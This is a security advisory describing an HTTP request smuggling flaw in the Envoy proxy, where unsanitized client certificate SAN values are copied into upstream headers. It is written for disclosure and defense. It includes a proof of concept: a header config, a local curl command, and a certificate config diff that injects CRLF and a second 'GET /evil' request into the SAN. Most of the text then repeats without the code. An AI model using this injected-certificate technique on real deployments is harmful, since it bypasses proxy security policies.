Impact
Request smuggling and bypass of security policies.
Affected components
HTTP
Attack vector/s
A specifically constructed HTTP request or mTLS connection with a specifically crafted client certificate.
Envoy configuration must also include an option to add request headers that were generated using inputs from the request, i.e. the peer certificate SAN.
Description
Envoy does not sanitize or escape request properties when generating request headers. This can lead to characters that are illegal in header values to be sent to the upstream service.
In the worst case it can cause upstream service to interpret the original request as two pipelined requests, possibly bypassing the intent of Envoy’s security policy.
Example exploit or proof-of-concept
First add a configuration to add request headers on requests to upstream.
+ request_headers_to_add:
+ - header:
+ key: x-foo
+ value: "%DOWNSTREAM_PEER_FINGERPRINT_256% %DOWNSTREAM_PEER_URI_SAN%"
Then with curl:
curl -v --cacert test/config/integration/certs/servercert.pem --cert /tmp/clientcert.pem --key /tmp/clientkey.pem https://lyft.com:10000 --resolve lyft.com:10000:127.0.0.1 -H "Host: 127.0.0.1:20000"
The client cert/key were generated via test/config/integration/certs/certs.sh with the following patch:
diff --git a/test/config/integration/certs/clientcert.cfg b/test/config/integration/certs/clientcert.cfg
index 59da6cb1ee..68f913d1bd 100644
--- a/test/config/integration/certs/clientcert.cfg
+++ b/test/config/integration/certs/clientcert.cfg
@@ -35,6 +35,6 @@ subjectKeyIdentifier = hash
authorityKeyIdentifier = keyid:always
[alt_names]
-URI.1 = spiffe://lyft.com/frontend-team
+URI.1 = spiffe://lyft.com/\r\n\r\nGET /evil HTTP/1.1\r\n\r\nfrontend-team
DNS.1 = lyft.com
DNS.2 = www.lyft.com
Detection
The detection is possible if the request properties that are used to synthesize new headers are recorded in the access log. Examining the request log for presence of illegal characters, such as CR or LF, can indicate a possible attack.
Mitigation
Disable adding request headers based on the downstream request properties, such as downstream certificate properties.
Impact
Request smuggling and bypass of security policies.
Affected components
HTTP
Attack vector/s
A specifically constructed HTTP request or mTLS connection with a specifically crafted client certificate.
Envoy configuration must also include an option to add request headers that were generated using inputs from the request, i.e. the peer certificate SAN.
Description
Envoy does not sanitize or escape request properties when generating request headers. This can lead to characters that are illegal in header values to be sent to the upstream service.
In the worst case it can cause upstream service to interpret the original request as two pipelined requests, possibly bypassing the intent of Envoy’s security policy.
Example exploit or proof-of-concept
First add a configuration to add request headers on requests to upstream.
Then with curl:
curl -v --cacert test/config/integration/certs/servercert.pem --cert /tmp/clientcert.pem --key /tmp/clientkey.pem https://lyft.com:10000 --resolve lyft.com:10000:127.0.0.1 -H "Host: 127.0.0.1:20000"The client cert/key were generated via test/config/integration/certs/certs.sh with the following patch:
Detection
The detection is possible if the request properties that are used to synthesize new headers are recorded in the access log. Examining the request log for presence of illegal characters, such as CR or LF, can indicate a possible attack.
Mitigation
Disable adding request headers based on the downstream request properties, such as downstream certificate properties.